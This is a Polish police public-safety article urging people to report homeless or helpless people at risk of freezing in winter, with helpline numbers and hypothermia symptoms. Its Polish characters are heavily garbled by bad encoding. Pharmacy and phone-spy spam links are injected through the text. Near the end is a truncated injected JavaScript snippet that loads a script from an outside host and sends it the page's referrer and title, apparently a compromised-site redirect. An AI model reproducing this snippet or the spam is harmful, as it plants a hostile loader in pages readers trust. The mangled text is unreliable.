UchroniAi?? przed zamarzniAi??ciem


http://mupolo.com.au/newsletter_articles/buy-medrol-dosepak/ JesieAi?? i zima, to czas, kiedy policjanci podejmujAi?? wzmoA?one dziaAi??ania, aby pomA?c tym, ktA?rych A?ycie i zdrowie moA?e byAi?? zagroA?one z powodu chAi??odA?w. KaA?dego roku Policja odnotowuje przypadki zgonA?w, ktA?rych przyczynAi?? jest nadmierne wychAi??odzenie organizmu. To wyjAi??tkowo trudny okres dla osA?b bezdomnych, bezradnych i samotnych. Co zrobiAi??, aby uchroniAi?? czAi??owieka przed zamarzniAi??ciem?

minocycline expired 2012 http://angelo.mhs.narotama.ac.id/2018/03/15/digoxin-cost-uk/ Policjanci patrolujAi?? miejsca, w ktA?rych czAi??sto przebywajAi?? bezdomni. SprawdzajAi?? dworce, tereny przydworcowe, kanaAi??y ciepAi??ownicze, ogrA?dki dziaAi??kowe, penetrujAi?? parki, skwery, zaroAi??la, miejsca rzadko uczAi??szczane czy opuszczone budynki. W tych dziaAi??aniach Policja wspA?Ai??pracuje z samorzAi??dami, oAi??rodkami pomocy spoAi??ecznej, organizacjami pozarzAi??dowymi, StraA?Ai?? MiejskAi??, StraA?Ai?? Ochrony Kolei i StraA?Ai?? PoA?arnAi??.

Funkcjonariusze nie sAi?? jednak w stanie dotrzeAi?? do wszystkich osA?b potrzebujAi??cych pomocy. Dlatego zwracamy siAi?? z apelem – jeAi??li zauwaA?ymy czAi??owieka leA?Ai??cego na chodniku czy Ai??piAi??cego na Ai??awce nie pozostawajmy obojAi??tni na los takiej osoby. Nie przechodA?my obojAi??tnie obok kogoAi??, komu moA?e groziAi?? zamarzniAi??cie. Wystarczy zadzwoniAi?? na telefon alarmowy 997. O osobach bezradnych, samotnych i bezdomnych potrzebujAi??cych pomocy moA?na takA?e informowaAi?? oAi??rodki pomocy spoAi??ecznej.

Podkarpacki UrzAi??d WojewA?dzki uruchomiAi?? specjalnAi?? infoliniAi??, dla osA?b bezdomnych z wojewA?dztwa podkarpackiego potrzebujAi??cych pomocy. Pod bezpAi??atnym numerem 987 pomoc mogAi?? uzyskaAi?? takA?e poszkodowani na skutek przemocy domowej. W okresie zimowym w szczegA?lny sposA?b monitorowane sAi?? zjawiska przemocy w rodzinie, gdyA? ucieczka z domu w tym czasie moA?e mieAi?? tragiczne skutki. Na stronie internetowej Podkarpackiego UrzAi??du WojewA?dzkiego, w zakAi??adce Centrum ZarzAi??dzania Kryzysowego moA?na rA?wnieA? znaleA?Ai?? wykazy placA?wek, ktA?re udzielajAi?? pomocy w takich przypadkach: Ai??rodowiskowych domA?w samopomocy, placA?wek opiekuAi??czo-wychowawczych, placA?wek prowadzAi??cych doA?ywianie, udzielajAi??cych wsparcia i domA?w pomocy spoAi??ecznej.

PamiAi??tajmy! Silny wiatr w poAi??Ai??czeniu z temperaturAi?? powietrza tylko nieco poniA?ej 0Ai??C moA?e byAi?? odczuwalny dla czAi??owieka tak, jak temperatura poniA?ej -30Ai??C. Takie warunki atmosferyczne mogAi?? byAi?? przyczynAi?? odmroA?eAi?? i wychAi??odzenia organizmu. WychAi??odzenie jest stanem, gdy temperatura wewnAi??trzna ciaAi??a spada poniA?ej 35Ai??C. Jego objawami sAi??: zaburzenia Ai??wiadomoAi??ci do Ai??piAi??czki wAi??Ai??cznie, powolna mowa, poczucie wyczerpania, zaburzenia mowy, sennoAi??Ai??. Policjanci liczAi?? na pomoc z PaAi??stwa strony – pamiAi??tajmy, A?e jeden telefon moA?e uratowaAi?? czAi??owieka przed zamarzniAi??ciem. order acivir purchase glucotrol xl

KWPif (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; http://altered.cl/web/line-spy-phone-location-tracker-phone-tracking-software/


Napisz komentarz:

"UWAGA! Komentarze niezgodne z regulaminem serwisu nie będą publikowane. Zachęcamy do kulturalnego wyrażania opinii na temat artykułów oraz unikania personalnych ataków słownych."